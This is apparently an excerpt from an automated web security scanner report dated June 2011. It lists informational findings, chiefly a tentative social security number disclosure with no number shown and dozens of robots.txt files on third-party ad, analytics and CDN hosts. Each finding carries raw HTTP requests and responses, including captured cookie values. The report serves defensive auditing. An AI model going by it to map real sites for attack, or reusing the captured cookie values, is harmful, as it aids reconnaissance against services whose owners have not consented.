Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; ak-mobile-detected=no; projxcookie=yes; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; mbox=session#1308010496673-477284#1308012472|check#true#1308010670; __cs_rr=1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_ppv=34

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
ETag: 33c455f72a75ec5d74989ffdc4e9a8a
Last-Modified: Mon, 13 Jun 2011 23:57:57 GMT
Content-Type: application/x-javascript
Content-Length: 475145
Cache-Control: max-age=587
Date: Tue, 14 Jun 2011 00:17:46 GMT
Connection: close
Vary: Accept-Encoding

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Sizzle.js
*
...[SNIP]...
hannelDomain;
if(MTVN.Player.context == "popout") instance = "popout";
else if(MTVN.Player.episodeUri != undefined) instance = "fullepisode";

var flashObjectId = "embeddedPlayer";
var flashVersion = "10.0.12.36";
var configParams = "instance=" + instance;

if(MTVN.Player.episodeUri == undefined) {
if(MTVN.Player.id != undefined) configParams += "&id=" + MTVN.Player.id;
if(MTVN.Player.vid != undefined) config
...[SNIP]...
24. Social security numbers disclosed  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://assets.olark.com
Path:   /a/assets/v0/site/6368-597-10-5672.js

Issue detail

The following social security number was disclosed in the response:

Issue background

Responses containing social security numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid SSNs and whether their disclosure within the application is appropriate.

Request

GET /a/assets/v0/site/6368-597-10-5672.js?cb=1308011453294&v=Loader131bdc7c1e82ecf151ffe2f859c39717b HTTP/1.1
Host: assets.olark.com
Proxy-Connection: keep-alive
Referer: http://polldaddy.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km_ai=Y8WuMkTtR3KKkCr5oWZY4tS0b10; km_abi=Y8WuMkTtR3KKkCr5oWZY4tS0b10; __utmx=220293574.00012337193820629337:1:1; __utmxx=220293574.00012337193820629337:1556163:2592000; __utmz=1.1307226223.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=1.1065674438.1307226223.1307226223.1307226223.1; km_lv=1307226224; km_uq=

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 14 Jun 2011 00:43:41 GMT
Content-Type: application/x-javascript
Content-Length: 2546
Last-Modified: Mon, 13 Jun 2011 14:29:19 GMT
Connection: close
P3P: CP='Olark does not have a P3P policy. Learn why here: http://olark.com/p3p'
Accept-Ranges: bytes


(function(){


var isNewVersion = olark._ && olark._.versions && (olark._.versions.follow || olark._.versions.popout)
if(isNewVersion) {
olark._.finish
...[SNIP]...
rl_quirks":"static.olark.com/css/7/6/769e0f8b65e0f8a0f12295ee77bf64f9.css","hkey":"PHNwYW4gc3R5bGU9ImRpc3BsYXk6bm9uZSI+PGEgaWQ9ImhibGluazkiPjwvYT5odHRwOi8vd3d3Lm9sYXJrLmNvbTwvc3Bhbj4=","site_id":"6368-597-10-5672"}});
}else{
olark.configure(function(conf){
conf.system.site_id="6368-597-10-5672";
});
olark._.finish();
}
})();
25. Robots.txt file  previous  next
There are 77 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

25.1. http://0.gravatar.com/avatar/ec595f306c9ab9861b31f653da65bf5a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://0.gravatar.com
Path:   /avatar/ec595f306c9ab9861b31f653da65bf5a

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 0.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: text/plain
Date: Tue, 14 Jun 2011 00:20:46 GMT
Expires: Tue, 14 Jun 2011 00:25:46 GMT
Last-Modified: Tue, 18 Jan 2011 12:04:24 GMT
Server: ECS (dca/5339)
X-Cache: HIT
Content-Length: 99
Connection: close

User-Agent: *
Disallow: /*.json
Disallow: /*.xml
Disallow: /*.php
Disallow: /*.vcf
Disallow: /*.qr
25.2. http://1.gravatar.com/avatar/1404aa006cbd4ccf1e1969ff0ed8d2d3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://1.gravatar.com
Path:   /avatar/1404aa006cbd4ccf1e1969ff0ed8d2d3

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 1.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: text/plain
Date: Tue, 14 Jun 2011 00:20:43 GMT
Expires: Tue, 14 Jun 2011 00:25:43 GMT
Last-Modified: Tue, 18 Jan 2011 12:04:24 GMT
Server: ECS (dca/5339)
X-Cache: HIT
Content-Length: 99
Connection: close

User-Agent: *
Disallow: /*.json
Disallow: /*.xml
Disallow: /*.php
Disallow: /*.vcf
Disallow: /*.qr
25.3. http://2.gravatar.com/avatar/c63392ca320086522cf4d55cbf1d3808  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2.gravatar.com
Path:   /avatar/c63392ca320086522cf4d55cbf1d3808

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 2.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: text/plain
Date: Tue, 14 Jun 2011 00:30:12 GMT
Expires: Tue, 14 Jun 2011 00:35:12 GMT
Last-Modified: Tue, 18 Jan 2011 12:04:24 GMT
Server: ECS (dca/5339)
X-Cache: HIT
Content-Length: 99
Connection: close

User-Agent: *
Disallow: /*.json
Disallow: /*.xml
Disallow: /*.php
Disallow: /*.vcf
Disallow: /*.qr
25.4. http://a.analytics.yahoo.com/p.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.analytics.yahoo.com
Path:   /p.pl

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.analytics.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:21:43 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-control: private, max-age=86400
Last-Modified: Thu, 26 May 2011 13:18:17 GMT
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /
25.5. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/plain
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /
25.6. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N447.153730.YAHOO.COM/B5548365.27

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Mon, 13 Jun 2011 14:11:24 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /
25.7. http://ad.yieldmanager.com/st  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.yieldmanager.com

Response

HTTP/1.0 200 OK
Date: Mon, 13 Jun 2011 14:11:23 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 13 Jun 2011 14:11:23 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /
25.8. http://ads.bluelithium.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.bluelithium.com

Response

HTTP/1.0 200 OK
Date: Tue, 14 Jun 2011 00:23:36 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Tue, 14 Jun 2011 00:23:36 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /
25.9. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 26 Oct 2010 14:01:22 GMT
Accept-Ranges: bytes
ETag: "43bb7d451675cb1:13de"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 14 Jun 2011 00:19:15 GMT
Connection: close

User-agent: *
Disallow: /
25.10. http://advertising.yahoo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.yahoo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: advertising.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:20:38 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 20 Aug 2010 06:56:58 GMT
Accept-Ranges: bytes
Content-Length: 69
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:
Sitemap: http://id.omg.yahoo.com/Sitemap.xml
25.11. http://advertisingcentral.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertisingcentral.yahoo.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: advertisingcentral.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:20:36 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 07 Apr 2009 00:03:14 GMT
Accept-Ranges: bytes
Content-Length: 1589
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

# $Id: robots.txt,v 1.1 2009/04/07 00:03:14 dranney Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
25.12. http://api.bizographics.com/v1/profile.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.bizographics.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 14 Jun 2011 00:13:56 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /
25.13. http://api.twitter.com/1/dallasmavs/lists/mavs-insiders/statuses.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /1/dallasmavs/lists/mavs-insiders/statuses.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 13:39:39 GMT
Server: Apache
Vary: Host,Accept-Encoding
Last-Modified: Mon, 06 Jun 2011 20:41:57 GMT
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=86400
Expires: Tue, 14 Jun 2011 13:39:39 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /
25.14. http://aux1.forexfactory.com/www/delivery/ai.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://aux1.forexfactory.com
Path:   /www/delivery/ai.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: aux1.forexfactory.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 12:02:39 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 11 Oct 2008 22:53:30 GMT
ETag: "10181d1-17a-459022278ee80"
Accept-Ranges: bytes
Content-Length: 378
Connection: close
Content-Type: text/plain; charset=UTF-8

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/). This file is required in the event that you
# use OpenX witho
...[SNIP]...
25.15. http://b.scorecardresearch.com/beacon.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Tue, 14 Jun 2011 17:45:46 GMT
Date: Mon, 13 Jun 2011 17:45:46 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /
25.16. http://b.voicefive.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /p

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Wed, 15 Jun 2011 00:16:56 GMT
Date: Tue, 14 Jun 2011 00:16:56 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /
25.17. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 20:19:44 GMT
Accept-Ranges: bytes
ETag: "0b02b30da1ac61:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 14 Jun 2011 00:13:56 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /
25.18. http://cheetah.vizu.com/a.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cheetah.vizu.com
Path:   /a.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cheetah.vizu.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:18:35 GMT
Server: PWS/1.7.2.3
X-Px: ms iad-agg-n35 ( iad-agg-n34), ht-d iad-agg-n34.panthercdn.com
ETag: "3c053-1a-775728c0"
Cache-Control: max-age=604800
Expires: Sat, 18 Jun 2011 16:26:03 GMT
Age: 201152
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Last-Modified: Fri, 03 Jun 2011 22:42:19 GMT
Connection: close

User-agent: *
Disallow: /
25.19. http://cm.mtv.overture.com/js_flat_1_0/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.mtv.overture.com
Path:   /js_flat_1_0/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cm.mtv.overture.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:18:18 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 03 May 2011 10:14:38 GMT
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /
25.20. http://d3.zedo.com/jsc/d3/ff2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d3.zedo.com
Path:   /jsc/d3/ff2.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d3.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:39:20 GMT
ETag: "3a9d10f-4c-46a2ae4677a00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
Date: Tue, 14 Jun 2011 00:28:48 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /
25.21. http://d7.zedo.com/img/d3/x.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/d3/x.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:39:20 GMT
ETag: "3a9d10f-4c-46a2ae4677a00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
Date: Tue, 14 Jun 2011 00:28:51 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /
25.22. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_3_2/StdBanner.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.serving-sys.com
Path:   /BurstingCachedScripts//SBTemplates_2_3_2/StdBanner.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 13:19:41 GMT
Server: Microsoft-IIS/6.0
Date: Tue, 14 Jun 2011 00:13:57 GMT
Content-Length: 28
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /
25.23. http://en.gravatar.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://en.gravatar.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: en.gravatar.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:30:09 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Tue, 18 Jan 2011 12:04:24 GMT
Accept-Ranges: bytes
Content-Length: 99
Vary: Accept-Encoding

User-Agent: *
Disallow: /*.json
Disallow: /*.xml
Disallow: /*.php
Disallow: /*.vcf
Disallow: /*.qr
25.24. http://en.search.wordpress.com/opensearch.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://en.search.wordpress.com
Path:   /opensearch.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: en.search.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:31:39 GMT
Content-Type: text/plain
Connection: close
ETag: "1a-4ca8d019-7c40b4"
Last-Modified: Sun, 03 Oct 2010 18:48:57 GMT
Content-Length: 26
X-nc: HIT luv 48
Accept-Ranges: bytes

User-agent: *
Disallow: /
25.25. http://en.wordpress.com/signup/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://en.wordpress.com
Path:   /signup/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: en.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:33:47 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://wordpress.com/xmlrpc.php
Content-Length: 494
X-nc: HIT ord 20

# If you are regularly crawling WordPress.com sites please use our firehose to receive real-time push updates instead.
# Please see http://en.wordpress.com/firehose/ for more details.

Sitemap: http:/
...[SNIP]...
25.26. https://en.wordpress.com/signup/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://en.wordpress.com
Path:   /signup/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: en.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:33:49 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://wordpress.com/xmlrpc.php

# If you are regularly crawling WordPress.com sites please use our firehose to receive real-time push updates instead.
# Please see http://en.wordpress.com/firehose/ for more details.

Sitemap: http:/
...[SNIP]...
25.27. http://farm1.static.flickr.com/70/buddyicons/11988005@N00.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://farm1.static.flickr.com
Path:   /70/buddyicons/11988005@N00.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: farm1.static.flickr.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:24:37 GMT
Content-Type: text/plain; charset=ISO-8859-1
Connection: close
Last-Modified: Fri, 13 May 2011 16:05:13 GMT
Accept-Ranges: bytes
Content-Length: 24
Server: Apache/2.0.52 (Red Hat)
Age: 116918
X-Cache: HIT from photocache104.flickr.re2.yahoo.com
X-Cache-Lookup: HIT from photocache104.flickr.re2.yahoo.com:81
Via: 1.1 photocache104.flickr.re2.yahoo.com:81 (squid/2.7.STABLE9)

User-agent: *
Disallow:
25.28. http://farm2.static.flickr.com/1311/buddyicons/29208959@N03.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://farm2.static.flickr.com
Path:   /1311/buddyicons/29208959@N03.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: farm2.static.flickr.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:24:37 GMT
Content-Type: text/plain; charset=ISO-8859-1
Connection: close
Last-Modified: Fri, 13 May 2011 15:52:09 GMT
Accept-Ranges: bytes
Content-Length: 24
Server: Apache/2.0.52 (Red Hat)
Age: 97879
X-Cache: HIT from photocache204.flickr.re2.yahoo.com
X-Cache-Lookup: HIT from photocache204.flickr.re2.yahoo.com:81
Via: 1.1 photocache204.flickr.re2.yahoo.com:81 (squid/2.7.STABLE9)

User-agent: *
Disallow:
25.29. http://farm3.static.flickr.com/2157/buddyicons/12951874@N00.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://farm3.static.flickr.com
Path:   /2157/buddyicons/12951874@N00.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: farm3.static.flickr.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:24:37 GMT
Content-Type: text/plain; charset=ISO-8859-1
Connection: close
Last-Modified: Fri, 13 May 2011 16:00:12 GMT
Accept-Ranges: bytes
Content-Length: 24
Server: Apache/2.0.52 (Red Hat)
Age: 135042
X-Cache: HIT from photocache314.flickr.ac4.yahoo.com
X-Cache-Lookup: HIT from photocache314.flickr.ac4.yahoo.com:81
Via: 1.1 photocache314.flickr.ac4.yahoo.com:81 (squid/2.7.STABLE9)

User-agent: *
Disallow:
25.30. http://farm4.static.flickr.com/3023/buddyicons/41047258@N00.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://farm4.static.flickr.com
Path:   /3023/buddyicons/41047258@N00.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: farm4.static.flickr.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:24:37 GMT
Content-Type: text/plain; charset=ISO-8859-1
Connection: close
Last-Modified: Fri, 13 May 2011 16:21:30 GMT
Accept-Ranges: bytes
Content-Length: 24
Server: Apache/2.0.52 (Red Hat)
Age: 128823
X-Cache: HIT from photocache404.flickr.ac4.yahoo.com
X-Cache-Lookup: HIT from photocache404.flickr.ac4.yahoo.com:81
Via: 1.1 photocache404.flickr.ac4.yahoo.com:81 (squid/2.7.STABLE9)

User-agent: *
Disallow:
25.31. http://farm5.static.flickr.com/4002/buddyicons/14646162@N03.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://farm5.static.flickr.com
Path:   /4002/buddyicons/14646162@N03.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: farm5.static.flickr.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:24:37 GMT
Content-Type: text/plain; charset=ISO-8859-1
Connection: close
Last-Modified: Fri, 13 May 2011 16:30:21 GMT
Accept-Ranges: bytes
Content-Length: 24
Server: Apache/2.0.52 (Red Hat)
Age: 118271
X-Cache: HIT from photocache514.flickr.ac4.yahoo.com
X-Cache-Lookup: HIT from photocache514.flickr.ac4.yahoo.com:81
Via: 1.1 photocache514.flickr.ac4.yahoo.com:81 (squid/2.7.STABLE9)

User-agent: *
Disallow:
25.32. http://farm6.static.flickr.com/5091/buddyicons/60432067@N07.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://farm6.static.flickr.com
Path:   /5091/buddyicons/60432067@N07.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: farm6.static.flickr.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:24:37 GMT
Content-Type: text/plain; charset=ISO-8859-1
Connection: close
Last-Modified: Fri, 13 May 2011 15:55:46 GMT
Accept-Ranges: bytes
Content-Length: 24
Server: Apache/2.0.52 (Red Hat)
Age: 187146
X-Cache: HIT from photocache604.flickr.bf1.yahoo.com
X-Cache-Lookup: HIT from photocache604.flickr.bf1.yahoo.com:81
Via: 1.1 photocache604.flickr.bf1.yahoo.com:81 (squid/2.7.STABLE9)

User-agent: *
Disallow:
25.33. http://feeds.bbci.co.uk/news/rss.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /news/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 24 Feb 2011 17:31:27 GMT
Server: Apache
Content-Length: 464
Content-Type: text/plain
Cache-Control: max-age=3600
Expires: Mon, 13 Jun 2011 15:45:54 GMT
Date: Mon, 13 Jun 2011 14:45:54 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /cgi-perl
Disallow: /lexaurus
Disallow: /mpapps
Disallow: /mpsearch
Disallow: /mtk
Disallow: /weatherbeta
Disallow: /weather/hi/about/newsid_7760000/7
...[SNIP]...
25.34. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 14 Jun 2011 00:14:13 GMT
